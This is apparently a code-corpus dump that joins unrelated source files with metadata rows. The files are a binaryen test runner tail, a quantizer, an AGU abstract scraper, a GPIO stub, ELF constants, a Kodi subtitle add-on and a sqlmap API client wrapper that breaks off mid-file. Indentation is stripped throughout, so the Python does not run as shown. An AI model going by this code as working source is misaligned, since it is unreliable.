('binaryenjs', binaryenjs.test_binaryen_js),
('binaryenjs_wasm', binaryenjs.test_binaryen_wasm),
('lit', run_lit),
])
# Run all the tests
def main():
all_suites = TEST_SUITES.keys()
skip_by_default = ['binaryenjs', 'binaryenjs_wasm']
if shared.options.list_suites:
for suite in all_suites:
print(suite)
return 0
for r in shared.requested:
if r not in all_suites:
print('invalid test suite: %s (see --list-suites)\n' % r)
return 1
if not shared.requested:
shared.requested = [s for s in all_suites if s not in skip_by_default]
for test in shared.requested:
TEST_SUITES[test]()
# Check/display the results
if shared.num_failures == 0:
print('\n[ success! ]')
if shared.warnings:
print('\n' + '\n'.join(shared.warnings))
if shared.num_failures > 0:
print('\n[ ' + str(shared.num_failures) + ' failures! ]')
return 1
return 0
if __name__ == '__main__':
sys.exit(main())
| apache-2.0 | 290,767,472,295,077,600 | 40.982188 | 183 | 0.601491 | false | 3.472743 | true | false | false |
eliasrg/SURF2017 | code/separate/coding/source/__init__.py | 1 | 5800 | # Copyright (c) 2017 Elias Riedel Gårding
# Licensed under the MIT License
import numpy as np
from scipy.interpolate import interp1d
from scipy.signal import convolve
import matplotlib.pyplot as plt
from . import lloyd_max
class Encoder:
def __init__(self, sim, tracker):
self.sim = sim
self.tracker = tracker
def encode(self, *msg):
# Just encode it with Lloyd-Max
# (pass it to channel encoder or digital channel)
i = self.tracker.lm_encoder.encode(*msg)
self.tracker.update(i)
return (i,)
def get_tracker(self):
return self.tracker
class Decoder:
def __init__(self, sim, tracker):
self.sim = sim
self.tracker = tracker
def clone(self):
return self.__class__(self.sim, self.tracker.clone())
def decode(self, *msg):
# Decode with the Lloyd-Max decoder
# (receive from channel encoder or digital channel)
x_est = self.tracker.lm_decoder.decode(*msg)
# Update the distribution tracker
assert len(msg) == 1 # One integer
i = msg[0]
self.tracker.update(i)
return (x_est,)
# Hikmet's code
# Constants
RESOLUTION=1<<7
class Distribution:
def __init__(self, interval, pdf):
self.interval=interval
self.pdf=pdf
self.is_hikmet = True
@classmethod
def bySamples(cls, x, fx): # Interpolate to get the pdf
# Use logarithmic interpolation to preserve log-concavity
dx=x[1]-x[0]
fx=np.array(fx, dtype = float) / sum(fx) / dx
Fx=np.cumsum(fx)*dx
v1 = sum(1 for i in Fx if i < 1e-5)
v2 = sum(1 for i in Fx if i < 1-1e-5)
x=x[v1:v2]
fx=fx[v1:v2]
fx=np.array(fx, dtype = float) / sum(fx) / dx
logfx=np.log(fx)
logpdf=interp1d(x, logfx, kind='linear',
bounds_error=False, fill_value=float('-inf'))
pdf = lambda t : np.exp(logpdf(t))
return cls((x[0],x[-1]), pdf)
def convolution(d1, d2):
a1,b1 = d1.interval
a2,b2 = d2.interval
delta = max(b1-a1,b2-a2) / float(RESOLUTION)
f1=[d1.pdf(i) for i in np.arange(a1,b1,delta)]
f2=[d2.pdf(i) for i in np.arange(a2,b2,delta)]
fx=convolve(f1, f2)
x=[a1+a2+delta*i for i in range(len(fx))]
return Distribution.bySamples(x, fx)
def LM(distribution, n):
# Some definitions
maxiter=1<<10
N=RESOLUTION
a,b = distribution.interval
x=np.linspace(a,b,N)
fx=np.array([distribution.pdf(i) for i in x])
fx[np.isnan(fx)]=0
dx=(b-a) / (N-1.)
Fx=np.cumsum(fx)*dx
index=lambda y: int(min(N-1, max(0, np.round((y-a) / float(dx)))))
# Initialization
c=np.zeros(n)
p=np.array([x[int(i)] for i in np.round(np.linspace(0, N, num=n+1)[1:-1])])
# Loop
error=1
iteration=0
while error > 0 and iteration<maxiter:
iteration +=1
# centers from boundaries
pin=[0]+[index(i) for i in p]+[N-1]
for i in range(n):
c[i]=sum(x[j]*fx[j] for j in range(pin[i],pin[i+1]+1))\
/sum( fx[j] for j in range(pin[i],pin[i+1]+1))
pin_temp=pin
# boundaries from centers
p=(c[:-1]+c[1:]) / 2.
pin=[0]+[index(i) for i in p] + [N-1]
error=sum(abs(pin_temp[i]-pin[i]) for i in range(n+1))
return ([a]+list(p)+[b],c)
class DistributionTracker:
"""Keeps track of the distribution of the plant's state."""
def __init__(self, sim, n_levels, distr=None,
lm_encoder=None, lm_decoder=None):
self.sim = sim
self.n_levels = n_levels
if distr is None:
assert lm_encoder is None and lm_decoder is None
W = self.sim.params.W
self.fw = Distribution((-10,10),
lambda x : W * np.exp(-x**2 / 2.) / np.sqrt(2.0 * np.pi)
)# pdf of w_t: N(0,W) with support (-10,10)
self.distr = self.fw
boundaries, levels = LM(self.distr,
2**self.sim.params.quantizer_bits)
self.lm_encoder = lloyd_max.Encoder(boundaries)
self.lm_decoder = lloyd_max.Decoder(levels, boundaries)
else:
assert lm_encoder is not None and lm_decoder is not None
self.distr = distr
self.lm_encoder = lm_encoder
self.lm_decoder = lm_decoder
# DEBUG
self.distrs = []
def clone(self):
new = self.__class__(self.sim, self.n_levels, self.distr,
self.lm_encoder, self.lm_decoder)
# DEBUG
new.distrs = self.distrs[:]
if hasattr(self, 'x'): new.x = self.x
if hasattr(self, 'fx'): new.fx = self.fx
if hasattr(self, 'w_x'): new.w_x = self.w_x
if hasattr(self, 'w_fx'): new.w_fx = self.w_fx
if hasattr(self, 'd1'): new.d1 = self.d1
if hasattr(self, 'fw'): new.fw = self.fw
return new
def update(self, i, debug_globals=dict()):
A = self.sim.params.alpha
L = self.sim.params.L(self.sim.t)
x_hat = self.lm_decoder.decode(i)
u = -L * x_hat
lo, hi = self.lm_decoder.get_interval(i)
lo = max(lo, self.distr.interval[0])
hi = min(hi, self.distr.interval[1])
self.d1 = Distribution((A*lo+u,A*hi+u), lambda x: self.distr.pdf((x-u) / float(A)))
self.distr = Distribution.convolution(self.d1, self.fw)
self.distrs.append(self.distr) # DEBUG
# DEBUG: For inspecting the local variables interactively
debug_globals.update(locals())
boundaries, levels = LM(self.distr, 2**self.sim.params.quantizer_bits)
self.lm_encoder = lloyd_max.Encoder(boundaries)
self.lm_decoder = lloyd_max.Decoder(levels, boundaries)
| mit | -8,962,764,819,531,782,000 | 31.216667 | 91 | 0.565442 | false | 3.111052 | false | false | false |
khundman/facetview | agu/agu_scrape.py | 1 | 1881 | from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait # available since 2.4.0
from selenium.webdriver.support import expected_conditions as EC
import time
output = "/users/hundman/documents/data_science/hyspiri_search/facetview-hyspiri-public/agu/"
driver = webdriver.Firefox()
start = 50000
stop = 100000
with open(output + "index", "a") as out:
found = 0
for num in range(start,stop):
# try:
driver.get("https://agu.confex.com/agu/fm15/meetingapp.cgi/Paper/" + str(num))
paper = None
print str(num)
try:
load_time = 3
if num == start:
load_time = 10
WebDriverWait(driver, load_time).until(EC.presence_of_element_located((By.CSS_SELECTOR, "section.item.People")))
time.sleep(3)
content = driver.find_element_by_id("main")
paper = True
except:
paper = False
if paper == True:
abstract = content.find_element_by_css_selector("section.item.Additional")
abstract = abstract.text
if len(abstract) > 1:
found += 1
print "found: " + str(found)
title = content.find_element_by_css_selector("li.itemTitle").text
all_auths = ""
auth_affils = ""
authors = content.find_elements(By.CSS_SELECTOR, "li.RoleListItem")
for auth in authors:
affil = auth.find_element_by_tag_name("span").text
all_auths += auth.find_element_by_tag_name("a").text + "::" + affil + "||"
string = '{ "index" : { "_index" : "agu_2015", "_type" : "type1", "_id" : "%s" } }\n' %(num)
out.write(string)
doc = '''{"authors":"%s", "title":"%s", "abstract":"%s"} \n''' %(all_auths, title, abstract)
out.write(doc.encode('utf-8'))
# except:
# print "issue with: " + str(cnt)
# cnt += 1
print "found: " + str(found)
out.write("\n")
driver.close()
#53876 | apache-2.0 | 5,617,017,469,024,694,000 | 29.852459 | 146 | 0.624668 | false | 2.952904 | false | false | false |
kervi/kervi | kervi-hal-win/kervi/platforms/windows/gpio.py | 2 | 1575 | from kervi.hal.gpio import IGPIODeviceDriver
class GPIODriver(IGPIODeviceDriver):
def __init__(self, gpio_id="generic_gpio"):
IGPIODeviceDriver.__init__(self, gpio_id)
pass
def _get_channel_type(self, channel):
from kervi.hal.gpio import CHANNEL_TYPE_GPIO, CHANNEL_TYPE_ANALOG_IN, CHANNEL_TYPE_ANALOG_OUT
if channel in ["GPIO1", "GPIO2", "GPIO3"]:
return CHANNEL_TYPE_GPIO
elif channel in ["DAC1", "DAC2"]:
return CHANNEL_TYPE_ANALOG_OUT
elif channel in ["ADC1", "ADC2"]:
return CHANNEL_TYPE_ANALOG_IN
def _get_channel_names(self):
return ["GPIO1", "GPIO2", "GPIO3", "DAC1", "DAC2", "ADC1", "ADC2"]
@property
def name(self):
return "Generic GPIO"
def define_as_input(self, pin, pullup=None, bounce_time=0):
print("define pin in")
def define_as_output(self, pin):
print("define pin out")
def define_as_pwm(self, pin, frequency, duty_cycle):
print("define pwm")
def set(self, pin, state):
print("set pin", state)
def get(self, pin):
print("get pin")
return 0
def pwm_start(self, channel, duty_cycle=None, frequency=None):
print("start pwm")
def pwm_stop(self, pin):
print("stop pwm")
def listen(self, pin, callback, bounce_time=0):
print("listen rising")
def listen_rising(self, pin, callback, bounce_time=0):
print("listen rising")
def listen_falling(self, pin, callback, bounce_time=0):
print("listen falling")
| mit | -6,191,158,839,289,138,000 | 27.636364 | 101 | 0.604444 | false | 3.32981 | false | false | false |
pombredanne/pyelftools | elftools/elf/constants.py | 1 | 3168 | #-------------------------------------------------------------------------------
# elftools: elf/constants.py
#
# Constants and flags, placed into classes for namespacing
#
# Eli Bendersky ([email protected])
# This code is in the public domain
#-------------------------------------------------------------------------------
class E_FLAGS(object):
""" Flag values for the e_flags field of the ELF header
"""
EF_ARM_EABIMASK=0xFF000000
EF_ARM_EABI_VER1=0x01000000
EF_ARM_EABI_VER2=0x02000000
EF_ARM_EABI_VER3=0x03000000
EF_ARM_EABI_VER4=0x04000000
EF_ARM_EABI_VER5=0x05000000
EF_ARM_GCCMASK=0x00400FFF
EF_ARM_RELEXEC=0x01
EF_ARM_HASENTRY=0x02
EF_ARM_SYMSARESORTED=0x04
EF_ARM_DYNSYMSUSESEGIDX=0x8
EF_ARM_MAPSYMSFIRST=0x10
EF_ARM_LE8=0x00400000
EF_ARM_BE8=0x00800000
EF_ARM_ABI_FLOAT_SOFT=0x00000200
EF_ARM_ABI_FLOAT_HARD=0x00000400
EF_MIPS_NOREORDER=1
EF_MIPS_PIC=2
EF_MIPS_CPIC=4
EF_MIPS_XGOT=8
EF_MIPS_64BIT_WHIRL=16
EF_MIPS_ABI2=32
EF_MIPS_ABI_ON32=64
EF_MIPS_32BITMODE = 256
EF_MIPS_NAN2008=1024
EF_MIPS_ARCH=0xf0000000
EF_MIPS_ARCH_1=0x00000000
EF_MIPS_ARCH_2=0x10000000
EF_MIPS_ARCH_3=0x20000000
EF_MIPS_ARCH_4=0x30000000
EF_MIPS_ARCH_5=0x40000000
EF_MIPS_ARCH_32=0x50000000
EF_MIPS_ARCH_64=0x60000000
EF_MIPS_ARCH_32R2=0x70000000
EF_MIPS_ARCH_64R2=0x80000000
class E_FLAGS_MASKS(object):
"""Masks to be used for convenience when working with E_FLAGS
This is a simplified approach that is also used by GNU binutils
readelf
"""
EFM_MIPS_ABI = 0x0000F000
EFM_MIPS_ABI_O32 = 0x00001000
EFM_MIPS_ABI_O64 = 0x00002000
EFM_MIPS_ABI_EABI32 = 0x00003000
EFM_MIPS_ABI_EABI64 = 0x00004000
class SHN_INDICES(object):
""" Special section indices
"""
SHN_UNDEF=0
SHN_LORESERVE=0xff00
SHN_LOPROC=0xff00
SHN_HIPROC=0xff1f
SHN_ABS=0xfff1
SHN_COMMON=0xfff2
SHN_HIRESERVE=0xffff
class SH_FLAGS(object):
""" Flag values for the sh_flags field of section headers
"""
SHF_WRITE=0x1
SHF_ALLOC=0x2
SHF_EXECINSTR=0x4
SHF_MERGE=0x10
SHF_STRINGS=0x20
SHF_INFO_LINK=0x40
SHF_LINK_ORDER=0x80
SHF_OS_NONCONFORMING=0x100
SHF_GROUP=0x200
SHF_TLS=0x400
SHF_COMPRESSED=0x800
SHF_MASKOS=0x0ff00000
SHF_EXCLUDE=0x80000000
SHF_MASKPROC=0xf0000000
class P_FLAGS(object):
""" Flag values for the p_flags field of program headers
"""
PF_X=0x1
PF_W=0x2
PF_R=0x4
PF_MASKOS=0x00FF0000
PF_MASKPROC=0xFF000000
# symbol info flags for entries
# in the .SUNW_syminfo section
class SUNW_SYMINFO_FLAGS(object):
""" Flags for the si_flags field of entries
in the .SUNW_syminfo section
"""
SYMINFO_FLG_DIRECT=0x1
SYMINFO_FLG_FILTER=0x2
SYMINFO_FLG_COPY=0x4
SYMINFO_FLG_LAZYLOAD=0x8
SYMINFO_FLG_DIRECTBIND=0x10
SYMINFO_FLG_NOEXTDIRECT=0x20
SYMINFO_FLG_AUXILIARY=0x40
SYMINFO_FLG_INTERPOSE=0x80
SYMINFO_FLG_CAP=0x100
SYMINFO_FLG_DEFERRED=0x200
class VER_FLAGS(object):
VER_FLG_BASE=0x1
VER_FLG_WEAK=0x2
VER_FLG_INFO=0x4
| unlicense | 5,769,264,028,461,571,000 | 24.344 | 80 | 0.651515 | false | 2.452012 | false | false | false |
bmi-forum/bmi-pyre | Snac/pyre/SnacCoupler.py | 5 | 1655 | #!/usr/bin/env python
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# <LicenseText>
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
def coupler(name="coupler", facility="coupler"):
return Coupler(name, facility)
from pyre.components.Component import Component
class Coupler(Component):
def __init__(self, name, facility):
Component.__init__(self, name, facility)
self.exchanger = None
return
def initialize(self, solver):
# exchanger could be either a FineGridExchanger (FGE)
# or a CoarseGridExchanger (CGE)
self.exchanger = solver.exchanger
self.exchanger.initialize(solver)
return
def launch(self, solver):
self.exchanger.launch(solver)
return
def initTemperature(self):
## # send initial temperature field from CGE to FGE
## self.exchanger.initTemperature()
return
def preVSolverRun(self):
self.exchanger.preVSolverRun()
return
def postVSolverRun(self):
self.exchanger.postVSolverRun()
return
def newStep(self):
self.exchanger.NewStep()
return
def applyBoundaryConditions(self):
self.exchanger.applyBoundaryConditions()
return
def stableTimestep(self, dt):
dt = self.exchanger.stableTimestep(dt)
return dt
def endTimestep(self, steps, done):
done = self.exchanger.endTimestep(steps,done)
return done
# version
__id__ = "$Id: SnacCoupler.py 1902 2004-08-19 18:23:55Z EunseoChoi $"
# End of file
| gpl-2.0 | 263,631,159,940,753,440 | 17.595506 | 80 | 0.567976 | false | 3.857809 | false | false | false |
kugan49/xbmc-betaseries | service.subtitles.betaseries/service.py | 2 | 19136 | # -*- coding: utf-8 -*-
import xbmc, xbmcaddon, xbmcgui, xbmcplugin, xbmcvfs
import os, sys, re, string, urllib, urllib2, socket, unicodedata, shutil, time, platform
import simplejson as json
__addon__ = xbmcaddon.Addon()
__addonid__ = __addon__.getAddonInfo('id')
__addonname__ = __addon__.getAddonInfo('name')
__addonversion__ = __addon__.getAddonInfo('version')
__icon__ = __addon__.getAddonInfo('icon')
__language__ = __addon__.getLocalizedString
__platform__ = platform.system() + " " + platform.release()
__profile__ = xbmc.translatePath( __addon__.getAddonInfo('profile') ).decode("utf-8")
__temp__ = xbmc.translatePath( os.path.join( __profile__, 'temp') ).decode("utf-8")
sys.path.append( os.path.join( __profile__, "lib") )
self_host = "http://api.betaseries.com"
self_apikey = "5a85a0adc953"
self_apiver = "2.4"
self_team_pattern = re.compile(r".*-([^-]+)$")
self_notify = __addon__.getSetting('notify') == 'true'
TEAMS = (
# SD[0] HD[1]
("lol|sys|dim", "dimension"),
("asap|xii|fqm|imm", "immerse|orenji"),
("excellence", "remarkable"),
("2hd|xor", "ctu"),
("tla", "bia"))
LANGUAGES = (
# [0] [1]
("br", "pt"),
("gr", "el"))
def other_team(team, team_from, team_to):
# get other team using TEAMS table
for x in TEAMS:
if len(re.findall(x[team_from], team)) > 0:
return x[team_to]
# return team if not found
log("other team not found")
return team
def normalize_lang(lang, lang_from, lang_to):
# normalize lang using LANGUAGES table
for x in LANGUAGES:
if len(re.findall(x[lang_from], lang)) > 0:
return x[lang_to]
# return lang if not found
return lang
def normalize_string(txt):
return unicodedata.normalize('NFKD', txt).encode('ascii', 'ignore')
def log(txt, level=xbmc.LOGDEBUG):
message = u'%s: %s' % (__addonid__, txt)
xbmc.log(msg=message, level=level)
def set_user_agent():
json_query = json.loads(xbmc.executeJSONRPC('{ "jsonrpc": "2.0", "method": "Application.GetProperties", "params": {"properties": ["version", "name"]}, "id": 1 }'))
try:
major = str(json_query['result']['version']['major'])
minor = str(json_query['result']['version']['minor'])
name = "Kodi" if int(major) >= 14 else "XBMC"
version = "%s %s.%s" % (name, major, minor)
except:
log("could not get app version")
version = "XBMC"
return "Mozilla/5.0 (compatible; " + __platform__ + "; " + version + "; " + __addonid__ + "/" + __addonversion__ + ")"
def get_params(string=""):
param=[]
if string == "":
paramstring=sys.argv[2]
else:
paramstring=string
if len(paramstring)>=2:
params=paramstring
cleanedparams=params.replace('?','')
if (params[len(params)-1]=='/'):
params=params[0:len(params)-2]
pairsofparams=cleanedparams.split('&')
param={}
for i in range(len(pairsofparams)):
splitparams={}
splitparams=pairsofparams[i].split('=')
if (len(splitparams))==2:
param[splitparams[0]]=splitparams[1]
return param
def get_url(url, referer=self_host):
req_headers = {
'User-Agent': self_user_agent,
'Cache-Control': 'no-store, no-cache, must-revalidate',
'Pragma': 'no-cache',
'Referer': referer}
request = urllib2.Request(url, headers=req_headers)
opener = urllib2.build_opener()
try:
response = opener.open(request)
contents = response.read()
return contents
except urllib2.HTTPError, e:
log('HTTPError = ' + str(e.code), xbmc.LOGERROR)
if e.code == 400:
return False
except urllib2.URLError, e:
log('URLError = ' + str(e.reason), xbmc.LOGERROR)
except Exception:
import traceback
log('generic exception: ' + traceback.format_exc(), xbmc.LOGERROR)
# when error occured
if self_notify:
xbmc.executebuiltin((u'Notification(%s,%s,%s,%s)' % (__addonname__, __language__(30008), 750, __icon__)).encode('utf-8', 'ignore'))
return False
def download_subtitle(url, ext, subversion, referer):
# name of temp file for download
local_tmp_file = os.path.join(__temp__, "betaseries." + ext)
log("downloading url : %s" % (url))
socket.setdefaulttimeout(15)
content = get_url(url, referer)
if content:
local_file_handle = open(local_tmp_file, "w" + "b")
local_file_handle.write(content)
local_file_handle.close()
log("file extension is : %s" % (ext))
if ext in ['zip','rar']:
files = os.listdir(__temp__)
init_filecount = len(files)
log("number of files : %s" % (init_filecount))
filecount = init_filecount
log("extracting zip file : %s" % (local_tmp_file))
xbmc.executebuiltin("XBMC.Extract(" + local_tmp_file + "," + __temp__ +")")
waittime = 0
while (filecount == init_filecount) and (waittime < 20): # nothing yet extracted
time.sleep(1) # wait 1 second to let the builtin function 'XBMC.extract' unpack
files = os.listdir(__temp__)
filecount = len(files)
waittime = waittime + 1
# if max waittime reached
if waittime == 20:
log("error unpacking files in : %s" % (__temp__))
else:
log("unpacked files in : %s" % (__temp__))
time.sleep(1)
files = os.listdir(__temp__)
log("looking for %s" % (subversion))
for filename in files:
log("checking file %s" % (filename))
if normalize_string(filename) == subversion:
filepath = os.path.normpath(os.path.join(__temp__, filename))
log("selected file : %s" % (filename))
return filepath
else:
log("selected file : %s" % (subversion))
return local_tmp_file
else:
return False
def search_subtitles(search):
subtitles = []
log("entering search_subtitles()")
if search['mode'] == "movie":
log("movies not supported!")
return False
# get video file name
dirsync = __addon__.getSetting('dirsync') == 'true'
if dirsync:
# get directory name as filename
filename = os.path.basename(os.path.dirname(search['path'])).lower()
else:
# or use filename
filename = os.path.basename(search['path']).lower()
# and remove file extension
filename = re.sub(r"\.[^.]+$", "", filename)
filename = normalize_string(filename)
log("after filename = %s" % (filename))
# if file, check if valid tvshow
if search['mode'] == "file" and not re.search(r"(?i)(s[0-9]+e[0-9]+|[0-9]+x?[0-9]{2,})", filename):
log("not a tvshow or badly named!")
return False
# get subtitle team
subteams = []
subteams.append(filename.replace(".","-"))
if len(subteams[0]) > 0:
# get team name (everything after "-")
subteams[0] = self_team_pattern.match("-" + subteams[0]).groups()[0].lower()
# find equivalent teams, if any
tmp = other_team(subteams[0],0,1)
if len(tmp) > 0 and tmp != subteams[0]:
subteams.append(tmp)
# find other equivalent teams, if any
tmp = other_team(subteams[0],1,0)
if len(tmp) > 0 and tmp != subteams[0]:
subteams.append(tmp)
log("after subteams = %s" % (subteams))
# configure socket
socket.setdefaulttimeout(10)
# define default url to get betaseries episode id from filename
episodeurl = "%s/episodes/scraper?file=%s&key=%s&v=%s" % (self_host, urllib.quote(filename), self_apikey, self_apiver)
# check video type
if search['mode'] == "tvshow":
# get playerid
json_query = '{"jsonrpc": "2.0", "method": "Player.GetActivePlayers", "id": 1}'
playerid = json.loads(xbmc.executeJSONRPC(json_query))['result'][0]['playerid']
# get tvshowid
json_query = '{"jsonrpc": "2.0", "method": "Player.GetItem", "params": {"playerid": ' + str(playerid) + ', "properties": ["tvshowid"]}, "id": 1}'
tvshowid = json.loads(xbmc.executeJSONRPC (json_query))['result']['item']['tvshowid']
# check result
if tvshowid > 0:
# get tvdbid
json_query = '{"jsonrpc": "2.0", "method": "VideoLibrary.GetTVShowDetails", "params": {"tvshowid": ' + str(tvshowid) + ', "properties": ["imdbnumber"]}, "id": 1}'
tvdbid_result = json.loads(xbmc.executeJSONRPC(json_query))
# if we have tvdbid, work with ids
if 'result' in tvdbid_result:
# get betaseries show id from tvdbid
tvdbid = tvdbid_result['result']['tvshowdetails']['imdbnumber']
showurl = "%s/shows/display?thetvdb_id=%s&key=%s&v=%s" % (self_host, tvdbid, self_apikey, self_apiver)
try:
showid = json.loads(get_url(showurl))["show"]["id"]
except:
log("could not parse data or fetch url for showid, cannot continue")
return False
log("after showid = %s" % (showid))
# then get betaseries episode id
episodeurl = "%s/episodes/search?show_id=%s&number=S%#02dE%#02d&key=%s&v=%s" % (self_host, showid, int(search['season']), int(search['episode']), self_apikey, self_apiver)
try:
episodeid = json.loads(get_url(episodeurl))["episode"]["id"]
log("after episodeid = %s" % (episodeid))
except:
log("error or episode not found!")
return False
# then get subtitles list
listurl = "%s/subtitles/episode?id=%s&key=%s&v=%s" % (self_host, episodeid, self_apikey, self_apiver)
try:
data = json.loads(get_url(listurl))["subtitles"]
except:
log("could not parse data or fetch url, cannot continue")
return False
# for each release version
log("parsing data after urlopen")
log("--------------------------")
for subtitle in data:
# get filename
subfile = normalize_string(subtitle["file"])
log("after subfile = %s" % (subfile))
# get file extension
ext = string.split(subfile,'.')[-1]
# get season number from data
season = int(subtitle["episode"]["season"])
log("after season = %s" % (season))
# get episode number from data
episode = int(subtitle["episode"]["episode"])
log("after episode = %s" % (episode))
# get names of files contained in zip file, if any
if len(subtitle["content"]) > 0:
content = subtitle["content"]
# or put filename in content
else:
content = [subtitle["file"]]
log("after content = %s" % (content))
# for each file in content
for subversion in content:
log("-------------")
# subtitle file name
subversion = normalize_string(subversion)
log("after subversion = %s" % (subversion))
# subtitle download url
link = subtitle["url"]
log("after link = %s" % (link))
try:
# normalize lang
lang2 = {
"VO": "en",
"VF": "fr",
"VOVF": "xx",
}[subtitle["language"]]
except:
log("unsupported language")
continue
# get note
if 0 <= int(subtitle["quality"]) <= 5:
note = int(subtitle["quality"])
else:
note = 0
log("after note = %s" % (note))
# check if file is a subtitle
if not len(re.findall(r"(?i)\.(srt|ssa|ass|sub)$", subversion)):
log("not a subtitle : %s" % (subversion))
continue
# if from a zip file
if len(content) > 1:
# check if file is for correct season and episode
search_string = r"(?i)(s%#02de%#02d|%d%#02d|%dx%#02d)" % (season, episode, season, episode, season, episode)
if not re.search(search_string, subversion):
log("file not matching episode : %s" % (subversion))
continue
# get subtitle file lang
langs = re.search(r"(?i)[ _.-](english|french|eng|fre|en|fr|vo|vf)[ _.-]", subversion)
# or get zip file lang
if langs == None:
langs = lang2
else:
langs = langs.group(1).lower()
log("after zip langs = %s" % (lang2))
try:
lang2 = {
"french": 'fr',
"english": 'en',
"fre": 'fr',
"eng": 'en',
"fr": 'fr',
"en": 'en',
"vf": 'fr',
"vo": 'en'
}[langs]
except:
log("unsupported language")
continue
log("after zip lang2 = %s" % (lang2))
try:
# get full language name
lang = xbmc.convertLanguage(lang2, xbmc.ENGLISH_NAME)
except:
log("unsupported language")
continue
# if lang = user gui language
if lang == search['uilang']:
# put this file on top
uilang = True
else:
uilang = False
log("after lang = %s, lang2 = %s" % (lang, lang2))
# check sync
sync = False
team = False
for (key, subteam) in enumerate(subteams):
# if team corresponds
if len(subteam) > 0 and len(re.findall(r"(?i)[ _.-](" + subteam + ")[ _.-]", subversion)) > 0:
# set sync tag
sync = True
# if videofile team matches subfile team
if key == 0:
team = True
log("after sync = %s" % (sync))
# check if this is for hearing impaired
if len(re.findall(r"(?i)[ _.-](CC|HI)[ _.-]", subversion)) > 0:
cc = True
else:
cc = False
log("after cc = %s" % (cc))
# if language allowed by user
if lang2 in search['langs']:
# add subtitle to list
subtitles.append({'uilang':uilang,'ext':ext,'filename':subversion,'link':link,'lang':lang,'lang2':lang2,"cc":cc,"sync":sync,"note":note,"team":team})
log("subtitle added : %s" % (subversion))
log("--------------------------")
if subtitles:
# get settings for sorting
uifirst = __addon__.getSetting('uifirst') == 'true'
ccfirst = __addon__.getSetting('ccfirst') == 'true'
# sort accordingly
log("sorting by filename asc")
subtitles.sort(key=lambda x: [x['filename']])
if not ccfirst:
log("sorting by cc last")
subtitles.sort(key=lambda x: [x['cc']])
log("sorting by note best")
subtitles.sort(key=lambda x: [x['note']], reverse=True)
log("sorting by lang asc")
subtitles.sort(key=lambda x: [x['lang']])
if ccfirst:
log("sorting by cc first")
subtitles.sort(key=lambda x: [not x['cc']])
if uifirst:
log("sorting by uilang first")
subtitles.sort(key=lambda x: [not x['uilang']])
log("sorting by sync first")
subtitles.sort(key=lambda x: [not x['sync']])
log("sorting by team first")
subtitles.sort(key=lambda x: [not x['team']])
log("sorted subtitles = %s" % (subtitles))
# for each subtitle
for item in subtitles:
# xbmc list item format
listitem = xbmcgui.ListItem(label=item["lang"],
label2=item["filename"],
iconImage=str(item["note"]),
thumbnailImage=item["lang2"])
# setting sync / CC tag
listitem.setProperty("sync", 'true' if item["sync"] else 'false')
listitem.setProperty("hearing_imp", 'true' if item["cc"] else 'false')
# adding item to GUI list
url = "plugin://%s/?action=download&link=%s&ext=%s&filename=%s" % (__addonid__, item["link"], item["ext"], urllib.quote(item["filename"]))
xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=url,listitem=listitem,isFolder=False)
else:
if self_notify:
xbmc.executebuiltin((u'Notification(%s,%s,%s,%s)' % (__addonname__, __language__(30010), 750, __icon__)).encode('utf-8', 'ignore'))
log("nothing found")
log("end of search_subtitles()")
# start of script
# clean up
if os.path.exists(__temp__):
log("deleting temp tree...")
shutil.rmtree(__temp__.encode("utf-8","ignore"))
log("recreating temp dir...")
xbmcvfs.mkdirs(__temp__)
# define user-agent
self_user_agent = set_user_agent()
# get params
params = get_params()
# called when user is searching for subtitles
if params['action'] == 'search':
item = {}
item['tvshow'] = xbmc.getInfoLabel("VideoPlayer.TVshowtitle").decode("utf-8")
item['year'] = xbmc.getInfoLabel("VideoPlayer.Year")
item['season'] = xbmc.getInfoLabel("VideoPlayer.Season")
item['episode'] = xbmc.getInfoLabel("VideoPlayer.Episode")
item['path'] = urllib.unquote(xbmc.Player().getPlayingFile().decode('utf-8'))
item['uilang'] = xbmc.getLanguage()
item['langs'] = []
# get user preferred languages for subtitles
for lang in urllib.unquote(params['languages']).decode('utf-8').split(","):
item['langs'].append(xbmc.convertLanguage(lang, xbmc.ISO_639_1))
# remove rar:// or stack://
if ( item['path'].find("rar://") > -1 ):
item['path'] = os.path.dirname(item['path'][6:])
elif ( item['path'].find("stack://") > -1 ):
stackPath = item['path'].split(" , ")
item['path'] = stackPath[0][8:]
# show item data in debug log
log("after item = %s" % (item))
# find playing mode
if len(item['tvshow']) > 0: item['mode'] = "tvshow"
elif item['year'] != "": item['mode'] = "movie"
else: item['mode'] = "file"
# search for subtitles
search_subtitles(item)
# called when user clicks on a subtitle
elif params['action'] == 'download':
# download link
sub = download_subtitle(params["link"], params["ext"], urllib.unquote(params["filename"]), self_host)
if sub:
# xbmc handles moving and using the subtitle
listitem = xbmcgui.ListItem(label=sub)
xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=sub,listitem=listitem,isFolder=False)
xbmcplugin.endOfDirectory(int(sys.argv[1]))
| gpl-2.0 | 4,025,818,231,595,275,000 | 40.690632 | 187 | 0.536685 | false | 3.764706 | false | false | false |
jetz/sqlmapcli | sqlmapcli/task.py | 1 | 8132 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
-----------------------------------------------------
@post('/scan/<taskid>/start')
@get('/scan/<taskid>/stop')
@get('/scan/<taskid>/kill')
@get('/scan/<taskid>/status')
@get('/scan/<taskid>/data')
-----------------------------------------------------
"""
import time
from urllib.parse import urljoin
import requests
from .logs import get_logger
from .exceptions import TaskStatusError, TaskResultError, TaskLogError
logger = get_logger('sqlmapcli')
class TaskStatus(object):
""" Task status constant """
READY = 'not running'
RUNNING = 'running'
FINISHED = 'terminated'
class Task(object):
def __init__(self, id, options, addr):
""" Create a task object.
Args:
id (str): task id from remote sqlmapapi server.
options (dict): options used to run task, see
`curl http://<host>:<port>/option/<taskid>/list`.
addr (str): remote sqlmapapi server address.
"""
self.id = id
self.addr = addr
self.options = options or {}
# always store url target in task object
self.url = self.options.get('url', None)
def __str__(self):
return '<Task#%s>' % self.id
def __repr__(self):
return str(self)
def _request(self, path, method='GET'):
""" Used to request remote sqlmapapi server.
